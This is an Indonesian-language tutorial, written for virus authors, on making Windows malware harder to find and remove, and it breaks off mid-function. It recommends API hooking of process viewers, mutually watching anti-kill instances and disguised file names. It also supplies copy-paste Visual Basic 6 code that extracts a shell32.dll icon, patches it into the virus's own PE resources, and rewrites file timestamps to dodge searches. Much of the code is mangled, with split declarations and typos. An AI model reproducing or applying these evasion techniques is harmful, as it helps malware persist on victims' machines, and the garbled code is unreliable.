$> A little Words...
Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).
$> Start...
Mungkin sebagian (Atau seluruhnya) Vx3r (Pembuat Virus) pasti menemukan suatu permasalahan dalam membuat Virusnya agar susah dihapus atau meminimalisir pendeteksian oleh User ataupun Anti Virus.
Bagaimana sih cara-cara Vx3r itu menyembunyikan Virusnya di komputer korban? Ada beberapa cara yang klasik dan sangat sering dilakukan, Seperti:
1. Merubah nama File Virus menjadi (mirip) File system Windows, contoh RunDll32.exe, Winsys32.exe,dll
2. Menempatkan File Virus di Folder Hidden atau di Folder System Windows.
3. Menghalangi Akses ke Task Manager maupun Tool-tool yang dapat menampilkan proses yang sedang berlangsung. Hal ini lumrah karena virus ingin eksistensinya dipertahankan.
4. Menggunakan nama file yang random atau acak.
5. Menggunakan Ikon yang umum seperti MS-Word, Folder, Setup program, dll.
6. Memblok fasilitas Search.
7. Dan lainnya.
Lalu apa saja kelemahannya? Untuk penggunaan Ikon yang umum hal ini sangat fatal, karena User dapat membedakan antara ikon Default File *.Exe dengan ikon yang dipakai oleh Virus. Sebagai contoh apabila si Virus memakai Ikon MS- Word maka akan terjadi suatu kejanggalan, "Ikonnya Word kok ekstensinya Exe?".
Contoh lagi kasus penggunaan nama file random atau acak. Pada hal ini diperlukan suatu penyimpanan dari nama file acak itu, karena pada Trigger Virus jalan dia akan mencari file yang dimaksud. Pemyimpanan nya pun berupa file ataupun key di registry. Kedua teknik penyimpanan tersebut sama baiknya apabila dilengkapi oleh teknik Enkripsi. Pada suatu Virus yang pernah saya temukan dan analisa, Kangen.E telah menggunakan nama acak dan penyimpanan di suatu file *.sys. Dan file tersebut dibiarkan apa adanya tanpa perlindungan apapun terhadap isinya. Hal ini memudahkan dalam melacak nama trigger virus tsb.
Sebenarnya langkah apa yang harus diambil agar virus kita tak mudah terlacak oleh User? Menurut pandangan saya ada beberapa poin yang sangat penting:
1. Lakukan teknik penggantian Ikon secara langsung (Ekstrak dan ganti), bukan mengandalkan ikon default.
2. Penggantian Filetime maupun FileDate dan ukuran pada file Virus agar tidak mudah ditemukan dengan Search.
3. Gunakan API-Hook dalam melacak tool Proses Viewer, jangan mengandalkan
windows Caption karena sudah banyak caption lagi.
tool yang tidak memakai window
4. Jika memungkinkan jangan me-launch instan virus dengan cara "shell", karena hal ini dapat berakibat Proses Virus menjadi Parent and Child. Bila sang parent mati maka si child pun akan ikut mati.
5. Selalu gunakan instan virus lain untuk saling melacak keberadaan virus (Anti- Kill process) sehingga virus memungkinkan untuk tetap eksis.
$> How to...?
Saya menggunakan Bahasa Pemograman Visual Basic 6.0 dalam mencoba teknik stealth (yang menurut saya) agak baik Serta beberapa referensi Source Code maupun artikel dari Internet.
Teknik ini juga saya coba pada Virus Diary.Exe (V 1.3-1.5) dengan beberapa perubahan.
1. Penggantian ikon
Jika anda pernah menemukan suatu software pengekstrak atau pengganti ikon (bahkan keduanya) suatu file, maka kurang lebih hal ini bisa juga diimplementasikan di Virus :D. Contoh algoritmanya :
START EXECUTION
|
Copy myself.exe to destination path
|
Search file yang akan diekstrak ikonnya
|
Ekstrak ikonnya, save to destination path
|
Change myself.exe dengan file ikon (*.Ico) yang sudah di ekstrak
|
Hapus File ikon apabila sudah tidak digunakan
|
END EXECUTION
Saya menggunakan file Shell32.Dll sebagai file yang akan diekstrak Ikonnya, dalam hal ini saya akan memilih ikon Default file *.exe (yang berwarna kotak putih-biru :P). Kira-kira begini source codenya :
(Diperlukan Objek PictureBox dalam Form)
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Sub cariikon(pathcari As String, pathekstrak As String, jenisikon As String, pic2 As PictureBox)
Dim poin As Long poin = 1
Dim i As Long Dim buf(1000) As Double Dim jum As Integer jum = 0
Dim jikon As Long jikon = 0
Dim init As String
init = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0) & Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
Dim strbaca As String strbaca = Space(2238) Dim fildat As String Dim new_dic As String Dim rs As String
rs = Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@" Dim buff As Double
buff = 1024 ^ 2
Open pathcari For Binary As #1 If LOF(1) > buff Then
fildat = Space(buff) Else
fildat = Space(LOF(1)) End If
balik:
If poin > LOF(1) Then GoTo tulis
End If
Get #1, poin, fildat
i = 1
carilagi:
DoEvents
i = InStr(i + 1, fildat, "(" & rs) If i > 0 Then
'lst.Add "#" & lst.Count & "#", i + poin - 1 buf(jum) = i + poin - 1
jum = jum + 1
End If
If i + Len(rs) > buff Or i = 0 Then poin = poin + buff - Len("(" & rs) - 1 GoTo balik
Else
GoTo carilagi End If
tulis:
Close
Open pathcari For Binary As #1 For poin = 0 To jum - 1 DoEvents
If Right(pathekstrak, 1) <> "\" Then pathekstrak = pathekstrak & "\" End If
If poin <> jenisikon Then GoTo lsg
Open pathekstrak & "Ikon.ico" For Output As #2: Close #2 Open pathekstrak & "Ikon.ico" For Binary As #2
'i = lst.Item("#" & poin & "#") i = buf(poin)
Get #1, i, strbaca
Put #2, 1, init & strbaca & Chr$(255) Close #2
If ikon(pathekstrak & "Ikon.ico", pic2) = 0 Then Kill pathekstrak & "Ikon.ico"
End If
DoEvents
lsg: Next poin Close #1
Close
End Sub
sub ikon(path As String, pic As PictureBox) On Error GoTo ero
pic.Picture = LoadPicture(path) ikon = 1
Exit Function ero:
ikon = 0
Exit Function End Function
---------------------------- -Cut disini & Start Copy-Paste dari Sini------------------------- -
Prosedur cari ikon akan mencari file yang akan diekstrak ikonnya berdasarkan index ikon tersebut. Ikon yang akan dihasilkan masih berukuran 16X16, tetapi hal itu sudah cukup untuk mengelabui User. Perlu diingat bahwa index ikon file *.Exe dalam shell32.Dll untuk tiap versi Windows adalah berbeda. Terutama untuk Windows 9x dan Windows 2k/2003/XP/NT.
Lalu bagaimana kita menukar atau change ikon virus kita dengan file ikon yang sudah diekstrak tsb?
(Referensi Source Code dari Internet, Author :Naveed, neenojee@hotmail.com)
1st. Module:
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Option Explicit Type DIB_HEADER
Size
Width
Height
Planes
Bitcount
Reserved
ImageSize
As Long
As Long
As Long
As Integer
As Integer
As Long
As Long
End Type
Type ICON_DIR_ENTRY bWidth
bHeight
bColorCount bReserved
wPlanes
wBitCount
dwBytesInRes dwImageOffset
End Type
Type ICON_DIR Reserved
Type
Count
End Type
Type DIB_BITS Bits()
End Type
As Byte
As Byte
As Byte
As Byte
As Integer
As Integer
As Long
As Long
As Integer
As Integer
As Integer
As Byte
Public Enum Errors FILE_CREATE_FAILED = 1000 FILE_READ_FAILED INVALID_PE_SIGNATURE INVALID_ICO NO_RESOURCE_TREE NO_ICON_BRANCH CANT_HACK_HEADERS
End Enum
Public Function ReplaceIcons(Source As String, Dest As String) As Long
Dim IcoDir As ICON_DIR Dim IcoDirEntry As ICON_DIR_ENTRY Dim tBits As DIB_BITS
Dim Icons() As IconDescriptor Dim lngRet As Long Dim BytesRead As Long Dim hSource As Long
Dim hDest As Long Dim ResTree As Long
hSource = CreateFile(Source, ByVal &H80000000, 0, ByVal 0&, 3, 0, ByVal 0) If hSource >= 0 Then
If Valid_ICO(hSource) Then SetFilePointer hSource, 0, 0, 0
ReadFile hSource, IcoDir, 6, BytesRead, ByVal 0& ReadFile hSource, IcoDirEntry, 16, BytesRead, ByVal 0& SetFilePointer hSource, IcoDirEntry.dwImageOffset, 0, 0 ReDim tBits.Bits(IcoDirEntry.dwBytesInRes) As Byte
ReadFile hSource, tBits.Bits(0), IcoDirEntry.dwBytesInRes, BytesRead, ByVal 0& CloseHandle hSource
hDest = CreateFile(Dest, ByVal (&H80000000 Or &H40000000), 0, ByVal 0&, 3, 0, ByVal 0)
If hDest >= 0 Then If Valid_PE(hDest) Then
ResTree = GetResTreeOffset(hDest)
If ResTree > 308 Then ' Sanity check
lngRet = GetIconOffsets(hDest, ResTree, Icons)
SetFilePointer hDest, Icons(1).Offset, 0, 0
WriteFile hDest, tBits.Bits(0), UBound(tBits.Bits), BytesRead, ByVal 0&
Else
CloseHandle hDest
End If
Else
CloseHandle hDest
End If
CloseHandle hDest
Else
End If
Else
CloseHandle hSource End If
Else
End If
ReplaceIcons = 0 Exit Function
End Function
Public Function Valid_ICO(hfile As Long) As Boolean
Dim tDir As ICON_DIR
Dim BytesRead As Long
If (hfile > 0) Then
ReadFile hfile, tDir, Len(tDir), BytesRead, ByVal 0&
If (tDir.Reserved = 0) And (tDir.Type = 1) And (tDir.Count > 0) Then
Valid_ICO = True
Else
Valid_ICO = False
End If
Else
Valid_ICO = False
End If
End Function
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
2nd. Module
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Option Explicit
Public Type IMAGE_DOS_HEADER
Magic As Integer
cblp As Integer
cp As Integer
crlc As Integer
cparhdr As Integer
minalloc As Integer
maxalloc As Integer
ss As Integer
sp As Integer
csum As Integer
ip As Integer
cs As Integer
lfarlc As Integer
ovno As Integer
res(3) As Integer
oemid As Integer
oeminfo As Integer
res2(9) As Integer
lfanew As Long
End Type
Public Type IMAGE_FILE_HEADER
Machine
NumberOfSections TimeDateStamp PointerToSymbolTable NumberOfSymbols
As Integer
As Integer
As Long
As Long
As Lon
SizeOfOtionalHeader As Integer
Characteristics As Integer
End Type
Public Type IMAGE_DATA_DIRECTORY
DataRVA As Long
DataSize As Long
End Type
Public Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkVer As Byte
MinorLinkVer As Byte
CodeSize As Long
InitDataSize As Long
unInitDataSize As Long
EntryPoint As Long
CodeBase As Long
DataBase As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOSVer As Integer
MinorOSVer As Integer
MajorImageVer As Integer
MinorImageVer As Integer
MajorSSVer As Integer
MinorSSVer As Integer
Win32Ver As Long
ImageSize As Long
HeaderSize As Long
Checksum As Long
Subsystem As Integer
DLLChars As Integer
StackRes As Long
StackCommit As Long
HeapReserve As Long
HeapCommit As Long
LoaderFlags As Long
RVAsAndSizes As Long
DataEntries(15) As IMAGE_DATA_DIRECTORY
End Type
Public Type IMAGE_SECTION_HEADER
SectionName(7) As Byte
Address As Long
VirtualAddress As Long
SizeOfData As Long
PData As Long
PReloc As Long
PLineNums As Long
RelocCount As Integer
LineCount As Integer
Characteristics As Long
End Type
Type IMAGE_RESOURCE_DIR
Characteristics As Long
TimeStamp As Long
MajorVersion As Integer
MinorVersion As Integer
NamedEntries As Integer
IDEntries As Integer
End Type
Type RESOURCE_DIR_ENTRY
Name As Long
Offset As Long
End Type
Type RESOURCE_DATA_ENTRY
Offset As Long
Size As Long
CodePage As Long
Reserved As Long
End Type
Public Type IconDescriptor
ID
Offset
Size
End Type
As Long
As Long
As Long
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hfile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private SectionAlignment Private FileAlignment Private ResSectionRVA Private ResSectionOffset
As Long
As Long
As Long
As Long
Public Function Valid_PE(hfile As Long) As Boolean
Dim Buffer(12) As Byte
Dim lngBytesRead As Long
Dim tDosHeader As IMAGE_DOS_HEADER
If (hfile > 0) Then
ReadFile hfile, tDosHeader, ByVal Len(tDosHeader), lngBytesRead, ByVal 0& CopyMemory Buffer(0), tDosHeader.Magic, 2
If (Chr(Buffer(0)) & Chr(Buffer(1)) = "MZ") Then SetFilePointer hfile, tDosHeader.lfanew, 0, 0 ReadFile hfile, Buffer(0), 4, lngBytesRead, ByVal 0&
If (Chr(Buffer(0)) = "P") And (Chr(Buffer(1)) = "E") And (Buffer(2) = 0) And (Buffer(3) = 0) Then
Valid_PE = True Exit Function
End If
End If
End If
Valid_PE = False
End Function
Public Function GetResTreeOffset(hfile As Long) As Long On Error GoTo ErrHandler:
Dim tDos
Dim tFile
Dim tOptional Dim tSections() Dim BytesRead Dim intC
Dim TreeFound
As IMAGE_DOS_HEADER As IMAGE_FILE_HEADER As IMAGE_OPTIONAL_HEADER As IMAGE_SECTION_HEADER As Long
As Integer
As Boolean
TreeFound = False If (hfile > 0) Then
SetFilePointer hfile, 0, 0, 0
' Get the offset of the Image File Header
ReadFile hfile, tDos, Len(tDos), BytesRead, ByVal 0& SetFilePointer hfile, ByVal tDos.lfanew + 4, 0, 0
' Get the Image File Header and the Image Optional Header ReadFile hfile, tFile, Len(tFile), BytesRead, ByVal 0& ReadFile hfile, tOptional, Len(tOptional), BytesRead, ByVal 0&
' Get section headers
ReDim tSections(tFile.NumberOfSections - 1) As IMAGE_SECTION_HEADER ReadFile hfile, tSections(0), Len(tSections(0)) * tFile.NumberOfSections,
BytesRead, ByVal 0&
' Make sure there is a resource tree in this file If (tOptional.DataEntries(2).DataSize) Then
' Save section alignment and file alignment of image SectionAlignment = tOptional.SectionAlignment FileAlignment = tOptional.FileAlignment
' Determine which section contains the resource tree For intC = 0 To UBound(tSections)
If (tSections(intC).VirtualAddress <= tOptional.DataEntries(2).DataRVA) _ And ((tSections(intC).VirtualAddress + tSections(intC).SizeOfData) >
tOptional.DataEntries(2).DataRVA) Then TreeFound = True
' Save RVA and offset of resource section for future calculations ResSectionRVA = tSections(intC).VirtualAddress
ResSectionOffset = tSections(intC).PData
' Calculate the physical file offset of the resouce tree GetResTreeOffset = tSections(intC).PData +
(tOptional.DataEntries(2).DataRVA - tSections(intC).VirtualAddress) Exit For
End If
Next intC
If Not TreeFound Then GetResTreeOffset = -1
End If
Else
GetResTreeOffset = -1 End If
Else
GetResTreeOffset = -1 End If
Exit Function
ErrHandler:
End Function
Public Function GetIconOffsets(hfile As Long, TreeOffset As Long, Icons() As IconDescriptor) As Long
On Error GoTo ErrHandler:
Dim Root As IMAGE_RESOURCE_DIR ' Root node of resource tree
Dim L1Entries() As RESOURCE_DIR_ENTRY ' 1st level of directory entries
Dim L2Root() As IMAGE_RESOURCE_DIR ' Level 2 resource directories
Dim L2Entries() As RESOURCE_DIR_ENTRY ' 2nd level of directory entries
Dim L3Root() As IMAGE_RESOURCE_DIR ' Level 3 resource directories
Dim L3Entries() As RESOURCE_DIR_ENTRY ' 3rd level of directory entries
Dim DataEntries() As RESOURCE_DATA_ENTRY ' Resource data entries
Dim DIB As DIB_HEADER ' Descriptor for icon images
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim Cursor As Long ' Temp val for setting file pointer
Dim BytesRead As Long ' For ReadFile()
Dim Count As Integer ' Number of icons found
If (hfile > 0) Then Count = 0
SetFilePointer hfile, ByVal TreeOffset, 0, 0
' Get the root node and begin navigating the resource tree ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0 ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
' Get first level child nodes
For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
SetFilePointer hfile, TreeOffset + 8 + (iLvl1 * 8), 0, 0 ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0& If L1Entries(iLvl1).Name = 3 Then
' Jump to level 2 and get directory
' Strip high-order byte from offset CopyMemory Cursor, L1Entries(iLvl1).Offset, 3 Cursor = Cursor + TreeOffset SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0& ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
IMAGE_RESOURCE_DIR
ReDim L2Entries(L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries) As RESOURCE_DIR_ENTRY
For iLvl2 = 1 To (L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries)
' Read second level child nodes CopyMemory Cursor, L1Entries(iLvl1).Offset, 3 Cursor = Cursor + TreeOffset
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0 ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
' Jump to level 3 and get directory CopyMemory Cursor, L2Entries(iLvl2).Offset, 3 Cursor = Cursor + TreeOffset SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0& ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim DataEntries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As RESOURCE_DATA_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third level child nodes CopyMemory Cursor, L2Entries(iLvl2).Offset, 3 Cursor = Cursor + TreeOffset
SetFilePointer hfile, (Cursor + 8 + (iLvl3 * 8)), 0, 0 ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to IMAGE_DATA_ENTRY and get RVA of IconDir structure SetFilePointer hfile, TreeOffset + (L3Entries(iLvl3).Offset), 0, 0 ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Convert RVA of IconDir structure to file offset and store Count = Count + 1
ReDim Preserve Icons(Count) As IconDescriptor Icons(Count).Offset = RVA_to_Offset(DataEntries(iLvl3).Offset)
' Store ID of icon resource Icons(Count).ID = L2Entries(iLvl2).Name
' Store Size of icon resource SetFilePointer hfile, Icons(Count).Offset, 0, 0
ReadFile hfile, DIB, ByVal Len(DIB), BytesRead, ByVal 0& Icons(Count).Size = DIB.ImageSize + 40
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
Count = 0
End If
' Return the number of icons found GetIconOffsets = Count Exit Function
ErrHandler:
End Function
Public Function HackDirectories(hfile As Long, ResTree As Long, DIBOffset As Long, _ DIBAttrib As ICON_DIR_ENTRY) As Boolean
On Error GoTo ErrHandler:
Dim Cursor As Long
Dim Root As IMAGE_RESOURCE_DIR
Dim L1Entries() As RESOURCE_DIR_ENTRY
Dim L2Root() As IMAGE_RESOURCE_DIR
Dim L2Entries() As RESOURCE_DIR_ENTRY
' File pointer position
' Root node of res tree
' First-level child nodes
' Second-level root nodes
' Second-level child nodes
Dim L3Root() As IMAGE_RESOURCE_DIR ' Third-level root nodes
Dim L3Entries() As RESOURCE_DIR_ENTRY ' Third-level child nodes
Dim DataEntries() As RESOURCE_DATA_ENTRY ' IMAGE_RESOURCE_DATA_ENTRY structs
Dim IcoDir As ICON_DIR ' IconDirectory in EXE
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim intC As Integer ' Loop Counter (general)
Dim BytesRead As Long ' Returned by Read/WriteFile API's
If (hfile >= 0) Then
' Convert DIBOffset to an RVA (needed for RESOURCE_DATA_ENTRY structures) DIBOffset = Offset_to_RVA(DIBOffset)
SetFilePointer hfile, ByVal ResTree, 0, 0 ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0&
ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
' Loop through first-level child nodes and find RT_GROUP_ICON branch For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
SetFilePointer hfile, ResTree + 8 + (iLvl1 * 8), 0, 0 ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0& If L1Entries(iLvl1).Name = &HE Then
' RT_GROUP_ICON branch found CopyMemory Cursor, L1Entries(iLvl1).Offset, 3 Cursor = Cursor + ResTree SetFilePointer hfile, Cursor, 0, 0
' Read second-level directory
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0& ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0 ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0& CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree SetFilePointer hfile, Cursor, 0, 0 ' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0& ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes CopyMemory Cursor, L2Entries(iLvl2).Offset, 3 Cursor = Cursor + ResTree + 8 + (iLvl3 * 8) SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to RESOURCE_DATA_ENTRY CopyMemory Cursor, L3Entries(iLvl3).Offset, 3 Cursor = Cursor + ResTree SetFilePointer hfile, Cursor, 0, 0
ReDim Preserve DataEntries(iLvl3) As RESOURCE_DATA_ENTRY ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Jump to and read ICON_DIR structure
Cursor = RVA_to_Offset(DataEntries(iLvl3).Offset) SetFilePointer hfile, Cursor, 0, 0 ReadFile hfile, IcoDir, 6, BytesRead, ByVal 0& For intC = 1 To IcoDir.Count
WriteFile hfile, DIBAttrib, Len(DIBAttrib) - 4, BytesRead, ByVal 0& SetFilePointer hfile, 2, 0, 1
Next intC
Next iLvl3
Next iLvl2
ElseIf L1Entries(iLvl1).Name = 3 Then CopyMemory Cursor, L1Entries(iLvl1).Offset, 3 Cursor = Cursor + ResTree SetFilePointer hfile, ByVal Cursor, 0, 0 ' Read second-level director
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0& ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0 ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0& CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree SetFilePointer hfile, Cursor, 0, 0 ' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0& ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes CopyMemory Cursor, L2Entries(iLvl2).Offset, 3 Cursor = Cursor + ResTree + 8 + (iLvl3 * 8) SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to and hack the RESOURCE_DATA_ENTRY Cursor = L3Entries(iLvl3).Offset + ResTree SetFilePointer hfile, Cursor, 0, 0 WriteFile hfile, DIBOffset, 4, BytesRead, ByVal 0&
WriteFile hfile, CLng(DIBAttrib.dwBytesInRes + 40), 4, BytesRead, ByVal
0&
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
HackDirectories = False Exit Function
End If
HackDirectories = True Exit Function
ErrHandler:
End Function
Private Function RVA_to_Offset(RVA As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of RVA and start of section
TempOffset = RVA - ResSectionRVA
If (TempOffset >= 0) Then
' Calculate the file offset of the RVA
RVA_to_Offset = ResSectionOffset + TempOffset
Else
RVA_to_Offset = -1
End If
Exit Function
ErrHandler:
End Function
Private Function Offset_to_RVA(Offset As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of Offset and start of section
' Get distance between offset and start of resource section TempOffset = Offset - ResSectionOffset
If TempOffset >= 0 Then
' Calculate RVA of the file offset Offset_to_RVA = ResSectionRVA + TempOffset
Else
Offset_to_RVA = -1 End If
Exit Function
ErrHandler:
End Function
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Prosedur ReplaceIcon (1st. Module) akan mengganti Ikon Virus kita dengan file *.Ico tsb (Source = Path file ikon, Dest = Path file yang akan diganti ikonnya), Ada beberapa kelemahan dalam penggantian Ikon ini. Pertama, bila Virus dikompress atau di-Pack dengan settingan untuk menghilangkan atau hanya megkompress resource dari File maka penggantian Ikon ini tidak bisa berjalan mulus. Kedua, untuk beberapa file yang akan dikestrak kadang-kadang ikon tidak berukuran 16X16, bahkan tidak bisa diekstrak sama sekali.
2. Penggantian Date dan Time File Virus
Field apakah yang paling sering digunakan dalam fasilitas Search suatu file di Windows? Waktu akses/modif/buat dari file.
Ambil contoh virus A.exe dibuat pada tanggal 1 Feb 2006, mulai menginfeksi komputer anda tanggal 2 Feb 2006. Maka yang harus anda lakukan dalam mencari file tsb dengan mengisikan field tanggal search dengan range 1 Feb 2006 sampai 2 Feb 2006.
Apa yang harus dilakukan? Kita harus rubah tanggal akes/modif/buat dari file Virus kita agar tidak (atau setidaknya mempersulit) User mencarinya. Berikut Source Code yang kira-kira dapat menggambarkan teknik tersebut :
(Referensi Source Code dari Internet, Author : marskarthik@angelfire.com)
---------------------------- -Cut disini & Start Copy-Paste dari sini------------------------- -
Option Explicit
Public Declare Function SetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long Public Declare Function GetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long Public Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long
Public Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long
Public Declare Function SystemTimeToFileTime Lib "kernel32" (lpSystemTime As SYSTEMTIME, lpFileTime As FILETIME) As Long
Public Declare Function LocalFileTimeToFileTime Lib "kernel32" (lpLocalFileTime As FILETIME, lpFileTime As FILETIME) As Long
Public Declare Function OpenFile Lib "kernel32" (ByVal lpFileName As String, lpReOpenBuff As OFSTRUCT, ByVal wStyle As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Const OF_READ = &H0 Public Const OF_READWRITE = &H2 Public Const OF_REOPEN = &H8000
Public Const OF_SHARE_COMPAT = &H0 Public Const OF_SHARE_DENY_NONE = &H40 Public Const OF_SHARE_DENY_READ = &H30 Public Const OF_SHARE_DENY_WRITE = &H20 Public Const OF_SHARE_EXCLUSIVE = &H10 Public Const OF_VERIFY = &H400 Public Const OF_WRITE = &H1 Public Const OFS_MAXPATHNAME = 128
Public Type OFSTRUCT cBytes As Byte fFixedDisk As Byte nErrCode As Integer Reserved1 As Integer Reserved2 As Integer
szPathName(OFS_MAXPATHNAME) As Byte End Type
Public Type FILETIME dwLowDateTime As Long dwHighDateTime As Long
End Type
Public Type SYSTEMTIME wYear As Integer wMonth As Integer wDayOfWeek As Integer wDay As Integer wHour As Integer wMinute As Integer wSecond As Integer
wMilliseconds As Integer End Type
Public Sub ubahtanggal(pathfil As String, hari As Long, bulan As Long, tahun As Long, Optional creat As Boolean, Optional modif As Boolean, Optional acces As Boolean) On Error Resume Next
Dim hfile As Long, rval As Long Dim buff As OFSTRUCT
Dim ctime As FILETIME, latime As FILETIME, mtime As FILETIME Dim stime As SYSTEMTIME
Dim fil As String
If IsMissing(creat) Then creat = False If IsMissing(modif) Then modif = False If IsMissing(acces) Then acces = False
hfile = OpenFile(pathfil, buff, OF_WRITE) If hfile Then
rval = GetFileTime(hfile, ctime, latime, mtime) If creat Then
rval = FileTimeToLocalFileTime(ctime, ctime) rval = FileTimeToSystemTime(ctime, stime)
